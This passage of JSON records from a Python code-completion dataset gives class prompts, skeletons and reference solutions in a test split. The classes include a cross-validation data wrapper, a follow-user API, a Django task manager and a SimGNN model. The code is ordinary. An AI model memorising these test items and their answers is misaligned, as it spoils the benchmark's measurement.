self.Testindex = 0\n self.CVindex = 1"], "bodies_text": "<|body_start_0|>\n assert cv_iters > 2, 'Cross validation folds must be more than 2 folds'\n self.cv_iters = cv_iters\n datapath = './Data'\n self.dataset = [[os.path.join(os.path.join(os.path.join(datapath, folder), label), image), int(label)] for folder in os.listdir(datapath) for label in os.listdir(os.path.join(datapath, folder)) for image in os.listdir(os.path.join(os.path.join(datapath, folder), label))]\n self.Ind = np.arange(len(self.dataset))\n self.shuffle()\n<|end_body_0|>\n\n<|body_start_1|>\n random.seed(231)\n random.shuffle(self.Ind)\n self.Ind = self.Ind[:int(len(self.Ind) / 5) * 5].reshape((self.cv_iters, -1))\n self.CVindex = 1\n self.Testindex = 0\n<|end_body_1|>\n\n<|body_start_2|>\n next_test = False\n if self.CVindex < self.cv_iters - 1:\n self.CVindex += 1\n if self.Testindex < self.cv_iters - 1:\n if self.Testindex == self.CVindex:\n self.CVindex += 1\n elif self.Testindex == self.CVindex:\n self.CVindex = 0\n next_test = True\n else:\n self.CVindex = 0\n next_test = True\n if next_test:\n if self.Testindex < self.cv_iters - 1:\n self.Testindex += 1\n else:\n self.Testindex = 0\n self.CVindex = 1\n<|end_body_2|>\n", "class_docstring": "A standard PyTorch definition of Dataset which defines the functions __len__ and __getitem__.", "class_name": "__DatasetWrapper", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass __DatasetWrapper:\n \"\"\"A standard PyTorch definition of Dataset which defines the functions __len__ and __getitem__.\"\"\"\n\n def __init__(self, cv_iters):\n \"\"\"create df for features and labels remove samples that are not shared between the two tables\"\"\"\n <|body_0|>\n\n def shuffle(self):\n \"\"\"categorize sample ID by label\"\"\"\n <|body_1|>\n\n def next(self):\n \"\"\"rotate to the next cross validation process\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n assert cv_iters > 2, 'Cross validation folds must be more than 2 folds'\n self.cv_iters = cv_iters\n datapath = 
'./Data'\n self.dataset = [[os.path.join(os.path.join(os.path.join(datapath, folder), label), image), int(label)] for folder in os.listdir(datapath) for label in os.listdir(os.path.join(datapath, folder)) for image in os.listdir(os.path.join(os.path.join(datapath, folder), label))]\n self.Ind = np.arange(len(self.dataset))\n self.shuffle()\n<|end_body_0|>\n\n<|body_start_1|>\n random.seed(231)\n random.shuffle(self.Ind)\n self.Ind = self.Ind[:int(len(self.Ind) / 5) * 5].reshape((self.cv_iters, -1))\n self.CVindex = 1\n self.Testindex = 0\n<|end_body_1|>\n\n<|body_start_2|>\n next_test = False\n if self.CVindex < self.cv_iters - 1:\n self.CVindex += 1\n if self.Testindex < self.cv_iters - 1:\n if self.Testindex == self.CVindex:\n self.CVindex += 1\n elif self.Testindex == self.CVindex:\n self.CVindex = 0\n next_test = True\n else:\n self.CVindex = 0\n next_test = True\n if next_test:\n if self.Testindex < self.cv_iters - 1:\n self.Testindex += 1\n else:\n self.Testindex = 0\n self.CVindex = 1\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000334", "length_bytes": 5905, "license_type": "no_license", "methods": [{"docstring": "create df for features and labels remove samples that are not shared between the two tables", "name": "__init__", "signature": "def __init__(self, cv_iters)"}, {"docstring": "categorize sample ID by label", "name": "shuffle", "signature": "def shuffle(self)"}, {"docstring": "rotate to the next cross validation process", "name": "next", "signature": "def next(self)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_val_000310", "prompt": "Implement the Python class `__DatasetWrapper` described below.\n\nClass description:\nA standard PyTorch definition of Dataset which defines the functions __len__ and __getitem__.\n\nMethod signatures and docstrings:\n- def __init__(self, cv_iters): create df for features and labels remove samples that are not shared between the two tables\n- def shuffle(self): categorize sample ID by label\n- def next(self): rotate to the next cross validation process", "prompted_full_text": "Implement the Python class `__DatasetWrapper` described below.\n\nClass description:\nA standard PyTorch definition of Dataset which defines the functions __len__ and __getitem__.\n\nMethod signatures and docstrings:\n- def __init__(self, cv_iters): create df for features and labels remove samples that are not shared between the two tables\n- def shuffle(self): categorize sample ID by label\n- def next(self): rotate to the next cross validation process\n\n<|skeleton|>\nclass __DatasetWrapper:\n \"\"\"A standard PyTorch definition of Dataset which defines the functions __len__ and __getitem__.\"\"\"\n\n def __init__(self, cv_iters):\n \"\"\"create df for features and labels remove samples that are not shared between the two tables\"\"\"\n <|body_0|>\n\n def shuffle(self):\n \"\"\"categorize sample ID by label\"\"\"\n <|body_1|>\n\n def next(self):\n \"\"\"rotate to the next cross validation process\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n assert cv_iters > 2, 'Cross validation folds must be more than 2 folds'\n self.cv_iters = cv_iters\n datapath = './Data'\n self.dataset = [[os.path.join(os.path.join(os.path.join(datapath, folder), label), image), int(label)] for folder in os.listdir(datapath) for label in os.listdir(os.path.join(datapath, folder)) for image in os.listdir(os.path.join(os.path.join(datapath, folder), label))]\n self.Ind = np.arange(len(self.dataset))\n 
self.shuffle()\n<|end_body_0|>\n\n<|body_start_1|>\n random.seed(231)\n random.shuffle(self.Ind)\n self.Ind = self.Ind[:int(len(self.Ind) / 5) * 5].reshape((self.cv_iters, -1))\n self.CVindex = 1\n self.Testindex = 0\n<|end_body_1|>\n\n<|body_start_2|>\n next_test = False\n if self.CVindex < self.cv_iters - 1:\n self.CVindex += 1\n if self.Testindex < self.cv_iters - 1:\n if self.Testindex == self.CVindex:\n self.CVindex += 1\n elif self.Testindex == self.CVindex:\n self.CVindex = 0\n next_test = True\n else:\n self.CVindex = 0\n next_test = True\n if next_test:\n if self.Testindex < self.cv_iters - 1:\n self.Testindex += 1\n else:\n self.Testindex = 0\n self.CVindex = 1\n<|end_body_2|>\n", "revision_id": "9a959ceeaa44c6d5a4d051e76862f5f7ab65e54b", "skeleton": "<|skeleton|>\nclass __DatasetWrapper:\n \"\"\"A standard PyTorch definition of Dataset which defines the functions __len__ and __getitem__.\"\"\"\n\n def __init__(self, cv_iters):\n \"\"\"create df for features and labels remove samples that are not shared between the two tables\"\"\"\n <|body_0|>\n\n def shuffle(self):\n \"\"\"categorize sample ID by label\"\"\"\n <|body_1|>\n\n def next(self):\n \"\"\"rotate to the next cross validation process\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class __DatasetWrapper:\n \"\"\"A standard PyTorch definition of Dataset which defines the functions __len__ and __getitem__.\"\"\"\n\n def __init__(self, cv_iters):\n \"\"\"create df for features and labels remove samples that are not shared between the two tables\"\"\"\n assert cv_iters > 2, 'Cross validation folds must be more than 2 folds'\n self.cv_iters = cv_iters\n datapath = './Data'\n self.dataset = [[os.path.join(os.path.join(os.path.join(datapath, folder), label), image), int(label)] for folder in os.listdir(datapath) for label in os.listdir(os.path.join(datapath, folder)) for image in os.listdir(os.path.join(os.path.join(datapath, folder), label))]\n self.Ind = np.arange(len(self.dataset))\n self.shuffle()\n\n def shuffle(self):\n \"\"\"categorize sample ID by label\"\"\"\n random.seed(231)\n random.shuffle(self.Ind)\n self.Ind = self.Ind[:int(len(self.Ind) / 5) * 5].reshape((self.cv_iters, -1))\n self.CVindex = 1\n self.Testindex = 0\n\n def next(self):\n \"\"\"rotate to the next cross validation process\"\"\"\n next_test = False\n if self.CVindex < self.cv_iters - 1:\n self.CVindex += 1\n if self.Testindex < self.cv_iters - 1:\n if self.Testindex == self.CVindex:\n self.CVindex += 1\n elif self.Testindex == self.CVindex:\n self.CVindex = 0\n next_test = True\n else:\n self.CVindex = 0\n next_test = True\n if next_test:\n if self.Testindex < self.cv_iters - 1:\n self.Testindex += 1\n else:\n self.Testindex = 0\n self.CVindex = 1\n", "source": "the_stack_v2_python_sparse", "source_path": "data_loader.py", "source_repo": "Bozhao-Liu/Kaggle-breast-cancer-autoencoder", "split": "test", "star_events_count": 1} {"blob_id": "88ee99fcf4634f8a3631379788692d568c5c8ac6", "bodies": ["follow_user = self.db.query(FollowUser).filter_by(src_user_id=self.current_user).filter_by(dst_user_id=user_id).filter(FollowUser.is_current()).first()\nif follow_user:\n self.set_status(409)\nelse:\n self.db.add(FollowUser(src_user_id=self.current_user, dst_user_id=user_id))\nself.db.commit()\nself.finish()", "follow_user = 
self.db.query(FollowUser).filter_by(src_user_id=self.current_user).filter_by(dst_user_id=user_id).filter(FollowUser.is_current()).first()\nif follow_user:\n follow_user.stop()\nelse:\n self.set_status(404)\nself.db.commit()\nself.finish()"], "bodies_text": "<|body_start_0|>\n follow_user = self.db.query(FollowUser).filter_by(src_user_id=self.current_user).filter_by(dst_user_id=user_id).filter(FollowUser.is_current()).first()\n if follow_user:\n self.set_status(409)\n else:\n self.db.add(FollowUser(src_user_id=self.current_user, dst_user_id=user_id))\n self.db.commit()\n self.finish()\n<|end_body_0|>\n\n<|body_start_1|>\n follow_user = self.db.query(FollowUser).filter_by(src_user_id=self.current_user).filter_by(dst_user_id=user_id).filter(FollowUser.is_current()).first()\n if follow_user:\n follow_user.stop()\n else:\n self.set_status(404)\n self.db.commit()\n self.finish()\n<|end_body_1|>\n", "class_docstring": "", "class_name": "API_FollowUser", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass API_FollowUser:\n\n def post(self, user_id):\n \"\"\"start following user Parameters ---------- dst_user_id: int (required) Returns ---------- CODES: 200: OK 409: already subscribed BODY: empty\"\"\"\n <|body_0|>\n\n def delete(self, user_id):\n \"\"\"stop following user Parameters ---------- dst_user_id: int (required) Returns ---------- CODES: 200: OK 404: current_user isn't subscribed on dst_user_id BODY: empty\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n follow_user = self.db.query(FollowUser).filter_by(src_user_id=self.current_user).filter_by(dst_user_id=user_id).filter(FollowUser.is_current()).first()\n if follow_user:\n self.set_status(409)\n else:\n self.db.add(FollowUser(src_user_id=self.current_user, dst_user_id=user_id))\n self.db.commit()\n self.finish()\n<|end_body_0|>\n\n<|body_start_1|>\n follow_user = self.db.query(FollowUser).filter_by(src_user_id=self.current_user).filter_by(dst_user_id=user_id).filter(FollowUser.is_current()).first()\n if follow_user:\n follow_user.stop()\n else:\n self.set_status(404)\n self.db.commit()\n self.finish()\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000335", "length_bytes": 7114, "license_type": "no_license", "methods": [{"docstring": "start following user Parameters ---------- dst_user_id: int (required) Returns ---------- CODES: 200: OK 409: already subscribed BODY: empty", "name": "post", "signature": "def post(self, user_id)"}, {"docstring": "stop following user Parameters ---------- dst_user_id: int (required) Returns ---------- CODES: 200: OK 404: current_user isn't subscribed on dst_user_id BODY: empty", "name": "delete", "signature": "def delete(self, user_id)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_005070", "prompt": "Implement the Python class `API_FollowUser` described below.\n\nClass description:\nImplement the API_FollowUser class.\n\nMethod signatures and docstrings:\n- def post(self, user_id): start following user Parameters ---------- dst_user_id: int (required) Returns ---------- CODES: 200: OK 409: already subscribed BODY: empty\n- def delete(self, user_id): stop following user Parameters ---------- dst_user_id: int (required) Returns ---------- CODES: 200: OK 404: current_user isn't subscribed on dst_user_id BODY: empty", "prompted_full_text": "Implement the Python class `API_FollowUser` described below.\n\nClass description:\nImplement the API_FollowUser class.\n\nMethod signatures and docstrings:\n- def 
post(self, user_id): start following user Parameters ---------- dst_user_id: int (required) Returns ---------- CODES: 200: OK 409: already subscribed BODY: empty\n- def delete(self, user_id): stop following user Parameters ---------- dst_user_id: int (required) Returns ---------- CODES: 200: OK 404: current_user isn't subscribed on dst_user_id BODY: empty\n\n<|skeleton|>\nclass API_FollowUser:\n\n def post(self, user_id):\n \"\"\"start following user Parameters ---------- dst_user_id: int (required) Returns ---------- CODES: 200: OK 409: already subscribed BODY: empty\"\"\"\n <|body_0|>\n\n def delete(self, user_id):\n \"\"\"stop following user Parameters ---------- dst_user_id: int (required) Returns ---------- CODES: 200: OK 404: current_user isn't subscribed on dst_user_id BODY: empty\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n follow_user = self.db.query(FollowUser).filter_by(src_user_id=self.current_user).filter_by(dst_user_id=user_id).filter(FollowUser.is_current()).first()\n if follow_user:\n self.set_status(409)\n else:\n self.db.add(FollowUser(src_user_id=self.current_user, dst_user_id=user_id))\n self.db.commit()\n self.finish()\n<|end_body_0|>\n\n<|body_start_1|>\n follow_user = self.db.query(FollowUser).filter_by(src_user_id=self.current_user).filter_by(dst_user_id=user_id).filter(FollowUser.is_current()).first()\n if follow_user:\n follow_user.stop()\n else:\n self.set_status(404)\n self.db.commit()\n self.finish()\n<|end_body_1|>\n", "revision_id": "0eab54eb283e7434734b9fbeabd7d3ba249772af", "skeleton": "<|skeleton|>\nclass API_FollowUser:\n\n def post(self, user_id):\n \"\"\"start following user Parameters ---------- dst_user_id: int (required) Returns ---------- CODES: 200: OK 409: already subscribed BODY: empty\"\"\"\n <|body_0|>\n\n def delete(self, user_id):\n \"\"\"stop following user Parameters ---------- dst_user_id: int (required) Returns ---------- CODES: 200: OK 404: current_user isn't subscribed on dst_user_id BODY: empty\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class API_FollowUser:\n def post(self, user_id):\n \"\"\"start following user Parameters ---------- dst_user_id: int (required) Returns ---------- CODES: 200: OK 409: already subscribed BODY: empty\"\"\"\n follow_user = self.db.query(FollowUser).filter_by(src_user_id=self.current_user).filter_by(dst_user_id=user_id).filter(FollowUser.is_current()).first()\n if follow_user:\n self.set_status(409)\n else:\n self.db.add(FollowUser(src_user_id=self.current_user, dst_user_id=user_id))\n self.db.commit()\n self.finish()\n\n def delete(self, user_id):\n \"\"\"stop following user Parameters ---------- dst_user_id: int (required) Returns ---------- CODES: 200: OK 404: current_user isn't subscribed on dst_user_id BODY: empty\"\"\"\n follow_user = self.db.query(FollowUser).filter_by(src_user_id=self.current_user).filter_by(dst_user_id=user_id).filter(FollowUser.is_current()).first()\n if follow_user:\n follow_user.stop()\n else:\n self.set_status(404)\n self.db.commit()\n self.finish()\n", "source": "the_stack_v2_python_sparse", "source_path": "backend/main_app/api_v1/follow.py", "source_repo": "zzzevaka/findchat", "split": "test", "star_events_count": 0} {"blob_id": "7816e6a38f17d8cb8bdd627dc9d513edea5a4ead", "bodies": ["if not party.__class__ == GenericParty:\n party = GenericParty.objects.get(party=party)\nall_owned_tasks = super(TaskManager, self).filter(ownership__party=party, 
completed=False).select_related('ownership')\ntask_list = []\nfor task in all_owned_tasks:\n ownership = task.ownership.filter(party=party).latest('created')\n if not ownership.disown:\n task_list.append(task)\nreturn task_list", "user_privileges = get_privileges_for_user(user)\nqueryset = super(TaskManager, self).filter(access_requirements__prototype__privilege__in=user_privileges)\nreturn queryset"], "bodies_text": "<|body_start_0|>\n if not party.__class__ == GenericParty:\n party = GenericParty.objects.get(party=party)\n all_owned_tasks = super(TaskManager, self).filter(ownership__party=party, completed=False).select_related('ownership')\n task_list = []\n for task in all_owned_tasks:\n ownership = task.ownership.filter(party=party).latest('created')\n if not ownership.disown:\n task_list.append(task)\n return task_list\n<|end_body_0|>\n\n<|body_start_1|>\n user_privileges = get_privileges_for_user(user)\n queryset = super(TaskManager, self).filter(access_requirements__prototype__privilege__in=user_privileges)\n return queryset\n<|end_body_1|>\n", "class_docstring": "Adding a method to get tasks currently owned by a user or group.", "class_name": "TaskManager", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass TaskManager:\n \"\"\"Adding a method to get tasks currently owned by a user or group.\"\"\"\n\n def filter_active_by_owner(self, party, *args, **kwargs):\n \"\"\"Takes a User, Group, or GenericParty and returns a list of tasks that are currently owned by them.\"\"\"\n <|body_0|>\n\n def can_be_seen_by_user(self, user, *args, **kwargs):\n \"\"\"Filters tasks that can be seen by a particular user. TODO: See if this can be optimized.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not party.__class__ == GenericParty:\n party = GenericParty.objects.get(party=party)\n all_owned_tasks = super(TaskManager, self).filter(ownership__party=party, completed=False).select_related('ownership')\n task_list = []\n for task in all_owned_tasks:\n ownership = task.ownership.filter(party=party).latest('created')\n if not ownership.disown:\n task_list.append(task)\n return task_list\n<|end_body_0|>\n\n<|body_start_1|>\n user_privileges = get_privileges_for_user(user)\n queryset = super(TaskManager, self).filter(access_requirements__prototype__privilege__in=user_privileges)\n return queryset\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000336", "length_bytes": 37716, "license_type": "permissive", "methods": [{"docstring": "Takes a User, Group, or GenericParty and returns a list of tasks that are currently owned by them.", "name": "filter_active_by_owner", "signature": "def filter_active_by_owner(self, party, *args, **kwargs)"}, {"docstring": "Filters tasks that can be seen by a particular user. TODO: See if this can be optimized.", "name": "can_be_seen_by_user", "signature": "def can_be_seen_by_user(self, user, *args, **kwargs)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_003918", "prompt": "Implement the Python class `TaskManager` described below.\n\nClass description:\nAdding a method to get tasks currently owned by a user or group.\n\nMethod signatures and docstrings:\n- def filter_active_by_owner(self, party, *args, **kwargs): Takes a User, Group, or GenericParty and returns a list of tasks that are currently owned by them.\n- def can_be_seen_by_user(self, user, *args, **kwargs): Filters tasks that can be seen by a particular user. 
TODO: See if this can be optimized.", "prompted_full_text": "Implement the Python class `TaskManager` described below.\n\nClass description:\nAdding a method to get tasks currently owned by a user or group.\n\nMethod signatures and docstrings:\n- def filter_active_by_owner(self, party, *args, **kwargs): Takes a User, Group, or GenericParty and returns a list of tasks that are currently owned by them.\n- def can_be_seen_by_user(self, user, *args, **kwargs): Filters tasks that can be seen by a particular user. TODO: See if this can be optimized.\n\n<|skeleton|>\nclass TaskManager:\n \"\"\"Adding a method to get tasks currently owned by a user or group.\"\"\"\n\n def filter_active_by_owner(self, party, *args, **kwargs):\n \"\"\"Takes a User, Group, or GenericParty and returns a list of tasks that are currently owned by them.\"\"\"\n <|body_0|>\n\n def can_be_seen_by_user(self, user, *args, **kwargs):\n \"\"\"Filters tasks that can be seen by a particular user. TODO: See if this can be optimized.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not party.__class__ == GenericParty:\n party = GenericParty.objects.get(party=party)\n all_owned_tasks = super(TaskManager, self).filter(ownership__party=party, completed=False).select_related('ownership')\n task_list = []\n for task in all_owned_tasks:\n ownership = task.ownership.filter(party=party).latest('created')\n if not ownership.disown:\n task_list.append(task)\n return task_list\n<|end_body_0|>\n\n<|body_start_1|>\n user_privileges = get_privileges_for_user(user)\n queryset = super(TaskManager, self).filter(access_requirements__prototype__privilege__in=user_privileges)\n return queryset\n<|end_body_1|>\n", "revision_id": "69e78d01065142446234e77ea7c8c31e3482af29", "skeleton": "<|skeleton|>\nclass TaskManager:\n \"\"\"Adding a method to get tasks currently owned by a user or group.\"\"\"\n\n def filter_active_by_owner(self, party, *args, **kwargs):\n \"\"\"Takes a User, Group, or GenericParty and returns a list of tasks that are currently owned by them.\"\"\"\n <|body_0|>\n\n def can_be_seen_by_user(self, user, *args, **kwargs):\n \"\"\"Filters tasks that can be seen by a particular user. TODO: See if this can be optimized.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class TaskManager:\n \"\"\"Adding a method to get tasks currently owned by a user or group.\"\"\"\n\n def filter_active_by_owner(self, party, *args, **kwargs):\n \"\"\"Takes a User, Group, or GenericParty and returns a list of tasks that are currently owned by them.\"\"\"\n if not party.__class__ == GenericParty:\n party = GenericParty.objects.get(party=party)\n all_owned_tasks = super(TaskManager, self).filter(ownership__party=party, completed=False).select_related('ownership')\n task_list = []\n for task in all_owned_tasks:\n ownership = task.ownership.filter(party=party).latest('created')\n if not ownership.disown:\n task_list.append(task)\n return task_list\n\n def can_be_seen_by_user(self, user, *args, **kwargs):\n \"\"\"Filters tasks that can be seen by a particular user. 
TODO: See if this can be optimized.\"\"\"\n user_privileges = get_privileges_for_user(user)\n queryset = super(TaskManager, self).filter(access_requirements__prototype__privilege__in=user_privileges)\n return queryset\n", "source": "the_stack_v2_python_sparse", "source_path": "what_apps/do/models.py", "source_repo": "jMyles/WHAT", "split": "test", "star_events_count": 0} {"blob_id": "9adc96bd7b6fdb25b973a79394ce1289b5c0300d", "bodies": ["super(SimGNN, self).__init__()\nself.args = args\nself.number_labels = number_of_labels\nself.setup_layers()", "if self.args.histogram == True:\n self.feature_count = self.args.tensor_neurons + self.args.bins\nelse:\n self.feature_count = self.args.tensor_neurons", "self.calculate_bottleneck_features()\nself.convolution_1 = GCNConv(self.number_labels, self.args.filters_1)\nself.convolution_2 = GCNConv(self.args.filters_1, self.args.filters_2)\nself.convolution_3 = GCNConv(self.args.filters_2, self.args.filters_3)\nself.attention = AttentionModule(self.args)\nself.tensor_network = TenorNetworkModule(self.args)\nself.fully_connected_first = torch.nn.Linear(self.feature_count, self.args.bottle_neck_neurons)\nself.scoring_layer = torch.nn.Linear(self.args.bottle_neck_neurons, 1)", "scores = torch.mm(abstract_features_1, abstract_features_2).detach()\nscores = scores.view(-1, 1)\nhist = torch.histc(scores, bins=self.args.bins)\nhist = hist / torch.sum(hist)\nhist = hist.view(1, -1)\nreturn hist", "features = self.convolution_1(features, edge_index)\nfeatures = torch.nn.functional.relu(features)\nfeatures = torch.nn.functional.dropout(features, p=self.args.dropout, training=self.training)\nfeatures = self.convolution_2(features, edge_index)\nfeatures = torch.nn.functional.relu(features)\nfeatures = torch.nn.functional.dropout(features, p=self.args.dropout, training=self.training)\nfeatures = self.convolution_3(features, edge_index)\nreturn features", "edge_index_1 = data['edge_index_1']\nedge_index_2 = data['edge_index_2']\nfeatures_1 = data['features_1']\nfeatures_2 = data['features_2']\nabstract_features_1 = self.convolutional_pass(edge_index_1, features_1)\nabstract_features_2 = self.convolutional_pass(edge_index_2, features_2)\nif self.args.histogram == True:\n hist = self.calculate_histogram(abstract_features_1, torch.t(abstract_features_2))\npooled_features_1 = self.attention(abstract_features_1)\npooled_features_2 = self.attention(abstract_features_2)\nscores = self.tensor_network(pooled_features_1, pooled_features_2)\nscores = torch.t(scores)\nif self.args.histogram == True:\n scores = torch.cat((scores, hist), dim=1).view(1, -1)\nscores = torch.nn.functional.relu(self.fully_connected_first(scores))\nscore = torch.sigmoid(self.scoring_layer(scores))\nreturn score"], "bodies_text": "<|body_start_0|>\n super(SimGNN, self).__init__()\n self.args = args\n self.number_labels = number_of_labels\n self.setup_layers()\n<|end_body_0|>\n\n<|body_start_1|>\n if self.args.histogram == True:\n self.feature_count = self.args.tensor_neurons + self.args.bins\n else:\n self.feature_count = self.args.tensor_neurons\n<|end_body_1|>\n\n<|body_start_2|>\n self.calculate_bottleneck_features()\n self.convolution_1 = GCNConv(self.number_labels, self.args.filters_1)\n self.convolution_2 = GCNConv(self.args.filters_1, self.args.filters_2)\n self.convolution_3 = GCNConv(self.args.filters_2, self.args.filters_3)\n self.attention = AttentionModule(self.args)\n self.tensor_network = TenorNetworkModule(self.args)\n self.fully_connected_first = torch.nn.Linear(self.feature_count, 
self.args.bottle_neck_neurons)\n self.scoring_layer = torch.nn.Linear(self.args.bottle_neck_neurons, 1)\n<|end_body_2|>\n\n<|body_start_3|>\n scores = torch.mm(abstract_features_1, abstract_features_2).detach()\n scores = scores.view(-1, 1)\n hist = torch.histc(scores, bins=self.args.bins)\n hist = hist / torch.sum(hist)\n hist = hist.view(1, -1)\n return hist\n<|end_body_3|>\n\n<|body_start_4|>\n features = self.convolution_1(features, edge_index)\n features = torch.nn.functional.relu(features)\n features = torch.nn.functional.dropout(features, p=self.args.dropout, training=self.training)\n features = self.convolution_2(features, edge_index)\n features = torch.nn.functional.relu(features)\n features = torch.nn.functional.dropout(features, p=self.args.dropout, training=self.training)\n features = self.convolution_3(features, edge_index)\n return features\n<|end_body_4|>\n\n<|body_start_5|>\n edge_index_1 = data['edge_index_1']\n edge_index_2 = data['edge_index_2']\n features_1 = data['features_1']\n features_2 = data['features_2']\n abstract_features_1 = self.convolutional_pass(edge_index_1, features_1)\n abstract_features_2 = self.convolutional_pass(edge_index_2, features_2)\n if self.args.histogram == True:\n hist = self.calculate_histogram(abstract_features_1, torch.t(abstract_features_2))\n pooled_features_1 = self.attention(abstract_features_1)\n pooled_features_2 = self.attention(abstract_features_2)\n scores = self.tensor_network(pooled_features_1, pooled_features_2)\n scores = torch.t(scores)\n if self.args.histogram == True:\n scores = torch.cat((scores, hist), dim=1).view(1, -1)\n scores = torch.nn.functional.relu(self.fully_connected_first(scores))\n score = torch.sigmoid(self.scoring_layer(scores))\n return score\n<|end_body_5|>\n", "class_docstring": "SimGNN: A Neural Network Approach to Fast Graph Similarity Computation https://arxiv.org/abs/1808.05689", "class_name": "SimGNN", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass SimGNN:\n \"\"\"SimGNN: A Neural Network Approach to Fast Graph Similarity Computation https://arxiv.org/abs/1808.05689\"\"\"\n\n def __init__(self, args, number_of_labels):\n \"\"\":param args: Arguments object. :param number_of_labels: Number of node labels.\"\"\"\n <|body_0|>\n\n def calculate_bottleneck_features(self):\n \"\"\"Deciding the shape of the bottleneck layer.\"\"\"\n <|body_1|>\n\n def setup_layers(self):\n \"\"\"Creating the layers.\"\"\"\n <|body_2|>\n\n def calculate_histogram(self, abstract_features_1, abstract_features_2):\n \"\"\"Calculate histogram from similarity matrix. :param abstract_features_1: Feature matrix for graph 1. :param abstract_features_2: Feature matrix for graph 2. :return hist: Histogram of similarity scores.\"\"\"\n <|body_3|>\n\n def convolutional_pass(self, edge_index, features):\n \"\"\"Making convolutional pass. :param edge_index: Edge indices. :param features: Feature matrix. :return features: Abstract feature matrix.\"\"\"\n <|body_4|>\n\n def forward(self, data):\n \"\"\"Forward pass with graphs. :param data: Data dictionary. 
:return score: Similarity score.\"\"\"\n <|body_5|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(SimGNN, self).__init__()\n self.args = args\n self.number_labels = number_of_labels\n self.setup_layers()\n<|end_body_0|>\n\n<|body_start_1|>\n if self.args.histogram == True:\n self.feature_count = self.args.tensor_neurons + self.args.bins\n else:\n self.feature_count = self.args.tensor_neurons\n<|end_body_1|>\n\n<|body_start_2|>\n self.calculate_bottleneck_features()\n self.convolution_1 = GCNConv(self.number_labels, self.args.filters_1)\n self.convolution_2 = GCNConv(self.args.filters_1, self.args.filters_2)\n self.convolution_3 = GCNConv(self.args.filters_2, self.args.filters_3)\n self.attention = AttentionModule(self.args)\n self.tensor_network = TenorNetworkModule(self.args)\n self.fully_connected_first = torch.nn.Linear(self.feature_count, self.args.bottle_neck_neurons)\n self.scoring_layer = torch.nn.Linear(self.args.bottle_neck_neurons, 1)\n<|end_body_2|>\n\n<|body_start_3|>\n scores = torch.mm(abstract_features_1, abstract_features_2).detach()\n scores = scores.view(-1, 1)\n hist = torch.histc(scores, bins=self.args.bins)\n hist = hist / torch.sum(hist)\n hist = hist.view(1, -1)\n return hist\n<|end_body_3|>\n\n<|body_start_4|>\n features = self.convolution_1(features, edge_index)\n features = torch.nn.functional.relu(features)\n features = torch.nn.functional.dropout(features, p=self.args.dropout, training=self.training)\n features = self.convolution_2(features, edge_index)\n features = torch.nn.functional.relu(features)\n features = torch.nn.functional.dropout(features, p=self.args.dropout, training=self.training)\n features = self.convolution_3(features, edge_index)\n return features\n<|end_body_4|>\n\n<|body_start_5|>\n edge_index_1 = data['edge_index_1']\n edge_index_2 = data['edge_index_2']\n features_1 = data['features_1']\n features_2 = data['features_2']\n abstract_features_1 = self.convolutional_pass(edge_index_1, features_1)\n abstract_features_2 = self.convolutional_pass(edge_index_2, features_2)\n if self.args.histogram == True:\n hist = self.calculate_histogram(abstract_features_1, torch.t(abstract_features_2))\n pooled_features_1 = self.attention(abstract_features_1)\n pooled_features_2 = self.attention(abstract_features_2)\n scores = self.tensor_network(pooled_features_1, pooled_features_2)\n scores = torch.t(scores)\n if self.args.histogram == True:\n scores = torch.cat((scores, hist), dim=1).view(1, -1)\n scores = torch.nn.functional.relu(self.fully_connected_first(scores))\n score = torch.sigmoid(self.scoring_layer(scores))\n return score\n<|end_body_5|>\n", "id": "stack_v2_sparse_classes_10k_test_000337", "length_bytes": 8576, "license_type": "no_license", "methods": [{"docstring": ":param args: Arguments object. :param number_of_labels: Number of node labels.", "name": "__init__", "signature": "def __init__(self, args, number_of_labels)"}, {"docstring": "Deciding the shape of the bottleneck layer.", "name": "calculate_bottleneck_features", "signature": "def calculate_bottleneck_features(self)"}, {"docstring": "Creating the layers.", "name": "setup_layers", "signature": "def setup_layers(self)"}, {"docstring": "Calculate histogram from similarity matrix. :param abstract_features_1: Feature matrix for graph 1. :param abstract_features_2: Feature matrix for graph 2. 
